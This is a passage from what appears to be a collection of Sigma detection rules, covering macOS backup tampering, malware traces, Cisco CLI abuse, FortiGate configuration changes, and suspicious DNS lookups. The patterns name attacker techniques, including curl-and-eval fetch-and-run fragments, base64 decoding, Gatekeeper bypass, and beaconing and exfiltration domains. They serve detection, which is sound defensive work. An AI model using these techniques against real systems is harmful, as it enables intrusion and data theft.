selection_view:
CommandLine|contains|all:
- 'tail'
- '-c'
selection_b64:
CommandLine|contains|all:
- 'base64'
- '-d' # Also covers "--decode"
- '>'
selection_files:
CommandLine|contains:
- '.avif'
- '.gif'
- '.jfif'
- '.jpeg'
- '.jpg'
- '.pjp'
- '.pjpeg'
- '.png'
- '.svg'
- '.webp'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml
================================================
title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
id: 452df256-da78-427a-866f-49fa04417d74
status: test
description: |
Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine
- https://www.loobins.io/binaries/tmutil/
author: Pratinav Chandra
date: 2024-05-29
tags:
- attack.impact
- attack.t1490
logsource:
category: process_creation
product: macos
detection:
selection_img:
- Image|endswith: '/tmutil'
- CommandLine|contains: 'tmutil'
selection_cmd:
CommandLine|contains: 'delete'
condition: all of selection_*
falsepositives:
- Legitimate activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml
================================================
title: Time Machine Backup Disabled Via Tmutil - MacOS
id: 2c95fa8a-8b8d-4787-afce-7117ceb8e3da
status: test
description: |
Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
An attacker can use this to prevent backups from occurring.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine
- https://www.loobins.io/binaries/tmutil/
author: Pratinav Chandra
date: 2024-05-29
tags:
- attack.impact
- attack.t1490
logsource:
category: process_creation
product: macos
detection:
selection_img:
- Image|endswith: '/tmutil'
- CommandLine|contains: 'tmutil'
selection_cmd:
CommandLine|contains: 'disable'
condition: all of selection_*
falsepositives:
- Legitimate administrator activity
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml
================================================
title: New File Exclusion Added To Time Machine Via Tmutil - MacOS
id: 9acf45ed-3a26-4062-bf08-56857613eb52
status: test
description: |
Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine
- https://www.loobins.io/binaries/tmutil/
author: Pratinav Chandra
date: 2024-05-29
tags:
- attack.impact
- attack.t1490
logsource:
category: process_creation
product: macos
detection:
selection_img:
- Image|endswith: '/tmutil'
- CommandLine|contains: 'tmutil'
selection_cmd:
CommandLine|contains: 'addexclusion'
condition: all of selection_*
falsepositives:
- Legitimate administrator activity
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml
================================================
title: Potential WizardUpdate Malware Infection
id: f68c4a4f-19ef-4817-952c-50dce331f4b0
status: test
description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
references:
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
- https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-17
tags:
- attack.command-and-control
logsource:
category: process_creation
product: macos
detection:
selection_1:
Image|endswith: '/sh'
CommandLine|contains|all:
- '=$(curl '
- 'eval'
selection_2:
Image|endswith: '/curl'
CommandLine|contains: '_intermediate_agent_'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml
================================================
title: Gatekeeper Bypass via Xattr
id: f5141b6d-9f42-41c6-a7bf-2a780678b29b
status: test
description: Detects macOS Gatekeeper bypass via xattr utility
references:
- https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md
- https://www.loobins.io/binaries/xattr/
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2024-04-18
tags:
- attack.defense-evasion
- attack.t1553.001
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/xattr'
CommandLine|contains|all:
- '-d'
- 'com.apple.quarantine'
condition: selection
falsepositives:
- Legitimate activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml
================================================
title: Potential XCSSET Malware Infection
id: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51
status: test
description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
references:
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-17
tags:
- attack.command-and-control
logsource:
category: process_creation
product: macos
detection:
selection_1_curl:
ParentImage|endswith: '/bash'
Image|endswith: '/curl'
CommandLine|contains:
- '/sys/log.php'
- '/sys/prepod.php'
- '/sys/bin/Pods'
selection_1_https:
CommandLine|contains: 'https://'
selection_other_1:
ParentImage|endswith: '/bash'
Image|endswith: '/osacompile'
CommandLine|contains|all:
- '/Users/'
- '/Library/Group Containers/'
selection_other_2:
ParentImage|endswith: '/bash'
Image|endswith: '/plutil'
CommandLine|contains|all:
- 'LSUIElement'
- '/Users/'
- '/Library/Group Containers/'
selection_other_3:
Image|endswith: '/zip'
CommandLine|contains|all:
- '-r'
- '/Users/'
- '/Library/Group Containers/'
condition: all of selection_1_* or 1 of selection_other_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/network/cisco/aaa/cisco_cli_clear_logs.yml
================================================
title: Cisco Clear Logs
id: ceb407f6-8277-439b-951f-e4210e3ed956
status: test
description: Clear command history in network OS which is used for defense evasion
references:
- https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html
- https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609
author: Austin Clark
date: 2019-08-12
modified: 2023-05-26
tags:
- attack.defense-evasion
- attack.t1070.003
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'clear logging'
- 'clear archive'
condition: keywords
falsepositives:
- Legitimate administrators may run these commands
level: high
================================================
FILE: rules/network/cisco/aaa/cisco_cli_collect_data.yml
================================================
title: Cisco Collect Data
id: cd072b25-a418-4f98-8ebc-5093fb38fe1a
status: test
description: Collect pertinent data from the configuration files
references:
- https://blog.router-switch.com/2013/11/show-running-config/
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html
author: Austin Clark
date: 2019-08-11
modified: 2023-01-04
tags:
- attack.discovery
- attack.credential-access
- attack.collection
- attack.t1087.001
- attack.t1552.001
- attack.t1005
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'show running-config'
- 'show startup-config'
- 'show archive config'
- 'more'
condition: keywords
falsepositives:
- Commonly run by administrators
level: low
================================================
FILE: rules/network/cisco/aaa/cisco_cli_crypto_actions.yml
================================================
title: Cisco Crypto Commands
id: 1f978c6a-4415-47fb-aca5-736a44d7ca3d
status: test
description: Show when private keys are being exported from the device, or when new certificates are installed
references:
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html
author: Austin Clark
date: 2019-08-12
modified: 2023-01-04
tags:
- attack.credential-access
- attack.defense-evasion
- attack.t1553.004
- attack.t1552.004
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'crypto pki export'
- 'crypto pki import'
- 'crypto pki trustpoint'
condition: keywords
falsepositives:
- Not commonly run by administrators. Also whitelist your known good certificates
level: high
================================================
FILE: rules/network/cisco/aaa/cisco_cli_disable_logging.yml
================================================
title: Cisco Disabling Logging
id: 9e8f6035-88bf-4a63-96b6-b17c0508257e
status: test
description: Turn off logging locally or remote
references:
- https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf
author: Austin Clark
date: 2019-08-11
modified: 2023-01-04
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'no logging'
- 'no aaa new-model'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/cisco/aaa/cisco_cli_discovery.yml
================================================
title: Cisco Discovery
id: 9705a6a1-6db6-4a16-a987-15b7151e299b
status: test
description: Find information about network devices that is not stored in config files
references:
- https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html
author: Austin Clark
date: 2019-08-12
modified: 2023-01-04
tags:
- attack.discovery
- attack.t1083
- attack.t1201
- attack.t1057
- attack.t1018
- attack.t1082
- attack.t1016
- attack.t1049
- attack.t1033
- attack.t1124
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'dir'
- 'show arp'
- 'show cdp'
- 'show clock'
- 'show ip interface'
- 'show ip route'
- 'show ip sockets'
- 'show processes'
- 'show ssh'
- 'show users'
- 'show version'
condition: keywords
falsepositives:
- Commonly used by administrators for troubleshooting
level: low
================================================
FILE: rules/network/cisco/aaa/cisco_cli_dos.yml
================================================
title: Cisco Denial of Service
id: d94a35f0-7a29-45f6-90a0-80df6159967c
status: test
description: Detect a system being shutdown or put into different boot mode
author: Austin Clark
date: 2019-08-15
modified: 2023-01-04
tags:
- attack.impact
- attack.t1495
- attack.t1529
- attack.t1565.001
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'shutdown'
- 'config-register 0x2100'
- 'config-register 0x2142'
condition: keywords
falsepositives:
- Legitimate administrators may run these commands, though rarely.
level: medium
================================================
FILE: rules/network/cisco/aaa/cisco_cli_file_deletion.yml
================================================
title: Cisco File Deletion
id: 71d65515-c436-43c0-841b-236b1f32c21e
status: test
description: See what files are being deleted from flash file systems
author: Austin Clark
date: 2019-08-12
modified: 2023-01-04
tags:
- attack.defense-evasion
- attack.impact
- attack.t1070.004
- attack.t1561.001
- attack.t1561.002
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'erase'
- 'delete'
- 'format'
condition: keywords
falsepositives:
- Will be used sometimes by admins to clean up local flash space
level: medium
================================================
FILE: rules/network/cisco/aaa/cisco_cli_input_capture.yml
================================================
title: Cisco Show Commands Input
id: b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b
status: test
description: See what commands are being input into the device by other people, full credentials can be in the history
author: Austin Clark
date: 2019-08-11
modified: 2023-01-04
tags:
- attack.credential-access
- attack.t1552.003
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'show history'
- 'show history all'
- 'show logging'
condition: keywords
falsepositives:
- Not commonly run by administrators, especially if remote logging is configured
level: medium
================================================
FILE: rules/network/cisco/aaa/cisco_cli_local_accounts.yml
================================================
title: Cisco Local Accounts
id: 6d844f0f-1c18-41af-8f19-33e7654edfc3
status: test
description: Find local accounts being created or modified as well as remote authentication configurations
author: Austin Clark
date: 2019-08-12
modified: 2023-01-04
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1136.001
- attack.t1098
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'username'
- 'aaa'
condition: keywords
falsepositives:
- When remote authentication is in place, this should not change often
level: high
================================================
FILE: rules/network/cisco/aaa/cisco_cli_modify_config.yml
================================================
title: Cisco Modify Configuration
id: 671ffc77-50a7-464f-9e3d-9ea2b493b26b
status: test
description: Modifications to a config that will serve an adversary's impacts or persistence
author: Austin Clark
date: 2019-08-12
modified: 2025-04-28
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.impact
- attack.t1490
- attack.t1505
- attack.t1565.002
- attack.t1053
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'ip http server'
- 'ip https server'
- 'kron policy-list'
- 'kron occurrence'
- 'policy-list'
- 'access-list'
- 'ip access-group'
- 'archive maximum'
- 'ntp server'
condition: keywords
falsepositives:
- Legitimate administrators may run these commands
level: medium
================================================
FILE: rules/network/cisco/aaa/cisco_cli_moving_data.yml
================================================
title: Cisco Stage Data
id: 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59
status: test
description: Various protocols maybe used to put data on the device for exfil or infil
author: Austin Clark
date: 2019-08-12
modified: 2023-01-04
tags:
- attack.collection
- attack.lateral-movement
- attack.command-and-control
- attack.exfiltration
- attack.t1074
- attack.t1105
- attack.t1560.001
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'tftp'
- 'rcp'
- 'puts'
- 'copy'
- 'configure replace'
- 'archive tar'
condition: keywords
falsepositives:
- Generally used to copy configs or IOS images
level: low
================================================
FILE: rules/network/cisco/aaa/cisco_cli_net_sniff.yml
================================================
title: Cisco Sniffing
id: b9e1f193-d236-4451-aaae-2f3d2102120d
status: test
description: Show when a monitor or a span/rspan is setup or modified
author: Austin Clark
date: 2019-08-11
modified: 2023-01-04
tags:
- attack.credential-access
- attack.discovery
- attack.t1040
logsource:
product: cisco
service: aaa
detection:
keywords:
- 'monitor capture point'
- 'set span'
- 'set rspan'
condition: keywords
falsepositives:
- Admins may setup new or modify old spans, or use a monitor for troubleshooting
level: medium
================================================
FILE: rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml
================================================
title: Cisco BGP Authentication Failures
id: 56fa3cd6-f8d6-4520-a8c7-607292971886
status: test
description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
references:
- https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
author: Tim Brown
date: 2023-01-09
modified: 2023-01-23
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.defense-evasion
- attack.credential-access
- attack.collection
- attack.t1078
- attack.t1110
- attack.t1557
logsource:
product: cisco
service: bgp
definition: 'Requirements: cisco bgp logs need to be enabled and ingested'
detection:
keywords_bgp_cisco:
'|all':
- ':179' # Protocol
- 'IP-TCP-3-BADAUTH'
condition: keywords_bgp_cisco
falsepositives:
- Unlikely. Except due to misconfigurations
level: low
================================================
FILE: rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml
================================================
title: Cisco LDP Authentication Failures
id: 50e606bf-04ce-4ca7-9d54-3449494bbd4b
status: test
description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
references:
- https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
author: Tim Brown
date: 2023-01-09
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.defense-evasion
- attack.credential-access
- attack.collection
- attack.t1078
- attack.t1110
- attack.t1557
logsource:
product: cisco
service: ldp
definition: 'Requirements: cisco ldp logs need to be enabled and ingested'
detection:
selection_protocol:
- 'LDP'
selection_keywords:
- 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL'
- 'TCPMD5AuthenFail'
condition: selection_protocol and selection_keywords
falsepositives:
- Unlikely. Except due to misconfigurations
level: low
================================================
FILE: rules/network/dns/net_dns_external_service_interaction_domains.yml
================================================
title: DNS Query to External Service Interaction Domains
id: aff715fa-4dd5-497a-8db3-910bea555566
status: test
description: |
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
references:
- https://twitter.com/breakersall/status/1533493587828260866
- https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287
- https://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234
author: Florian Roth (Nextron Systems), Matt Kelly (list of domains)
date: 2022-06-07
modified: 2026-01-24
tags:
- attack.initial-access
- attack.t1190
- attack.reconnaissance
- attack.t1595.002
logsource:
category: dns
detection:
selection:
query|endswith:
- '.burpcollaborator.net' # Portswigger Burpsuite Collaborator
- '.canarytokens.com' # Thinkst Canary Canarytokens
- '.ceye.io'
- '.ddns.1443.eu.org' # dig.pm
- '.ddns.bypass.eu.org' # dig.pm
- '.ddns.xn--gg8h.eu.org' # dig.pm
- '.digimg.store' # dnslog.ink
- '.dns.su18.org' # javaweb.org
- '.dnshook.site' # webhook.site
- '.dnslog.cn'
- '.dnslog.ink' # dnslog.ink
- '.instances.httpworkbench.com' # httpworkbench.com
- '.interact.sh' # Project Discovery Interactsh
- '.log.dnslog.pp.ua' # dnslog.org
- '.log.dnslog.qzz.io' # dnslog.org
- '.log.dnslogs.dpdns.org' # dnslog.org
- '.log.javaweb.org' # javaweb.org
- '.log.nat.cloudns.ph' # dnslog.org
- '.oast.fun' # Project Discovery Interactsh
- '.oast.live' # Project Discovery Interactsh
- '.oast.me' # Project Discovery Interactsh
- '.oast.online' # Project Discovery Interactsh
- '.oast.pro' # Project Discovery Interactsh
- '.oast.site' # Project Discovery Interactsh
- '.oastify.com' # Portswigger Burpsuite Collaborator
- '.p8.lol' # javaweb.org
- '.requestbin.net'
filter_main_polling:
query|contains: 'polling.oastify.com'
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate security scanning.
level: high
================================================
FILE: rules/network/dns/net_dns_mal_cobaltstrike.yml
================================================
title: Cobalt Strike DNS Beaconing
id: 2975af79-28c4-4d2f-a951-9095f229df29
status: test
description: Detects suspicious DNS queries known from Cobalt Strike beacons
references:
- https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
- https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
author: Florian Roth (Nextron Systems)
date: 2018-05-10
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1071.004
logsource:
category: dns
detection:
selection1:
query|startswith:
- 'aaa.stage.'
- 'post.1'
selection2:
query|contains: '.stage.123456.'
condition: 1 of selection*
falsepositives:
- Unknown
level: critical
================================================
FILE: rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml
================================================
title: Monero Crypto Coin Mining Pool Lookup
id: b593fd50-7335-4682-a36c-4edcb68e4641
status: stable
description: Detects suspicious DNS queries to Monero mining pools
references:
- https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
author: Florian Roth (Nextron Systems)
date: 2021-10-24
tags:
- attack.impact
- attack.t1496
- attack.exfiltration
- attack.t1567
logsource:
category: dns
detection:
selection:
query|contains:
- 'pool.minexmr.com'
- 'fr.minexmr.com'
- 'de.minexmr.com'
- 'sg.minexmr.com'
- 'ca.minexmr.com'
- 'us-west.minexmr.com'
- 'pool.supportxmr.com'
- 'mine.c3pool.com'
- 'xmr-eu1.nanopool.org'
- 'xmr-eu2.nanopool.org'
- 'xmr-us-east1.nanopool.org'
- 'xmr-us-west1.nanopool.org'
- 'xmr-asia1.nanopool.org'
- 'xmr-jp1.nanopool.org'
- 'xmr-au1.nanopool.org'
- 'xmr.2miners.com'
- 'xmr.hashcity.org'
- 'xmr.f2pool.com'
- 'xmrpool.eu'
- 'pool.hashvault.pro'
condition: selection
falsepositives:
- Legitimate crypto coin mining
level: high
================================================
FILE: rules/network/dns/net_dns_susp_b64_queries.yml
================================================
title: Suspicious DNS Query with B64 Encoded String
id: 4153a907-2451-4e4f-a578-c52bb6881432
status: test
description: Detects suspicious DNS queries using base64 encoding
references:
- https://github.com/krmaxwell/dns-exfiltration
author: Florian Roth (Nextron Systems)
date: 2018-05-10
modified: 2022-10-09
tags:
- attack.exfiltration
- attack.t1048.003
- attack.command-and-control
- attack.t1071.004
logsource:
category: dns
detection:
selection:
query|contains: '==.'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/network/dns/net_dns_susp_telegram_api.yml
================================================
title: Telegram Bot API Request
id: c64c5175-5189-431b-a55e-6d9882158251
status: test
description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
references:
- https://core.telegram.org/bots/faq
- https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/
- https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
- https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
author: Florian Roth (Nextron Systems)
date: 2018-06-05
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1102.002
logsource:
category: dns
detection:
selection:
query: 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq
condition: selection
falsepositives:
- Legitimate use of Telegram bots in the company
level: medium
================================================
FILE: rules/network/dns/net_dns_susp_txt_exec_strings.yml
================================================
title: DNS TXT Answer with Possible Execution Strings
id: 8ae51330-899c-4641-8125-e39f2e07da72
status: test
description: Detects strings used in command execution in DNS TXT Answer
references:
- https://twitter.com/stvemillertime/status/1024707932447854592
- https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1
author: Markus Neis
date: 2018-08-08
modified: 2021-11-27
tags:
- attack.command-and-control
- attack.t1071.004
logsource:
category: dns
detection:
selection:
record_type: 'TXT'
answer|contains:
- 'IEX'
- 'Invoke-Expression'
- 'cmd.exe'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/dns/net_dns_wannacry_killswitch_domain.yml
================================================
title: Wannacry Killswitch Domain
id: 3eaf6218-3bed-4d8a-8707-274096f12a18
status: test
description: Detects wannacry killswitch domain dns queries
references:
- https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign
author: Mike Wade
date: 2020-09-16
modified: 2022-03-24
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: dns
detection:
selection:
query:
- 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.testing'
- 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.test'
- 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com'
- 'ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf.com'
- 'iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea.com'
condition: selection
falsepositives:
- Analyst testing
level: high
================================================
FILE: rules/network/firewall/net_firewall_cleartext_protocols.yml
================================================
title: Cleartext Protocol Usage
id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e
status: stable
description: |
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.
Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
references:
- https://www.cisecurity.org/controls/cis-controls-list/
- https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf
- https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
author: Alexandr Yampolskyi, SOC Prime, Tim Shelton
date: 2019-03-26
modified: 2022-10-10
tags:
- attack.credential-access
# - CSC4
# - CSC4.5
# - CSC14
# - CSC14.4
# - CSC16
# - CSC16.5
# - NIST CSF 1.1 PR.AT-2
# - NIST CSF 1.1 PR.MA-2
# - NIST CSF 1.1 PR.PT-3
# - NIST CSF 1.1 PR.AC-1
# - NIST CSF 1.1 PR.AC-4
# - NIST CSF 1.1 PR.AC-5
# - NIST CSF 1.1 PR.AC-6
# - NIST CSF 1.1 PR.AC-7
# - NIST CSF 1.1 PR.DS-1
# - NIST CSF 1.1 PR.DS-2
# - ISO 27002-2013 A.9.2.1
# - ISO 27002-2013 A.9.2.2
# - ISO 27002-2013 A.9.2.3
# - ISO 27002-2013 A.9.2.4
# - ISO 27002-2013 A.9.2.5
# - ISO 27002-2013 A.9.2.6
# - ISO 27002-2013 A.9.3.1
# - ISO 27002-2013 A.9.4.1
# - ISO 27002-2013 A.9.4.2
# - ISO 27002-2013 A.9.4.3
# - ISO 27002-2013 A.9.4.4
# - ISO 27002-2013 A.8.3.1
# - ISO 27002-2013 A.9.1.1
# - ISO 27002-2013 A.10.1.1
# - PCI DSS 3.2 2.1
# - PCI DSS 3.2 8.1
# - PCI DSS 3.2 8.2
# - PCI DSS 3.2 8.3
# - PCI DSS 3.2 8.7
# - PCI DSS 3.2 8.8
# - PCI DSS 3.2 1.3
# - PCI DSS 3.2 1.4
# - PCI DSS 3.2 4.3
# - PCI DSS 3.2 7.1
# - PCI DSS 3.2 7.2
# - PCI DSS 3.2 7.3
logsource:
category: firewall
detection:
selection:
dst_port:
- 8080
- 21
- 80
- 23
- 50000
- 1521
- 27017
- 3306
- 1433
- 11211
- 15672
- 5900
- 5901
- 5902
- 5903
- 5904
selection_allow1:
action:
- forward
- accept
- 2
selection_allow2:
blocked: "false" # not all fws set action value, but are set to mark as blocked or allowed or not
condition: selection and 1 of selection_allow*
falsepositives:
- Unknown
level: low
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml
================================================
title: FortiGate - New Administrator Account Created
id: cd0a4943-0edd-42cf-b50c-06f77a10d4c1
status: experimental
description: Detects the creation of an administrator account on a Fortinet FortiGate Firewall.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.persistence
- attack.t1136.001
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Add'
cfgpath: 'system.admin'
condition: selection
falsepositives:
- An administrator account can be created for legitimate purposes. Investigate the account details to determine if it is authorized.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml
================================================
title: FortiGate - Firewall Address Object Added
id: 5c8d7b41-3812-432f-a0bb-4cfb7c31827e
status: experimental
description: Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.defense-evasion
- attack.t1562
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Add'
cfgpath: 'firewall.address'
condition: selection
falsepositives:
- An address could be added or deleted for legitimate purposes.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml
================================================
title: FortiGate - New Firewall Policy Added
id: f24ab7a8-f09a-4319-82c1-915586aa642b
status: experimental
description: Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.defense-evasion
- attack.t1562
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Add'
cfgpath: 'firewall.policy'
condition: selection
falsepositives:
- A firewall policy can be added for legitimate purposes.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml
================================================
title: FortiGate - New Local User Created
id: ddbbe845-1d74-43a8-8231-2156d180234d
status: experimental
description: |
Detects the creation of a new local user on a Fortinet FortiGate Firewall.
The new local user could be used for VPN connections.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.persistence
- attack.t1136.001
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Add'
cfgpath: 'user.local'
condition: selection
falsepositives:
- A local user can be created for legitimate purposes. Investigate the user details to determine if it is authorized.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml
================================================
title: FortiGate - New VPN SSL Web Portal Added
id: 2bfb6216-0c31-4d20-8501-2629b29a3fa2
status: experimental
description: |
Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.
This behavior was observed in pair with modification of VPN SSL settings.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.persistence
- attack.initial-access
- attack.t1133
logsource:
product: fortigate
service: event
detection:
selection:
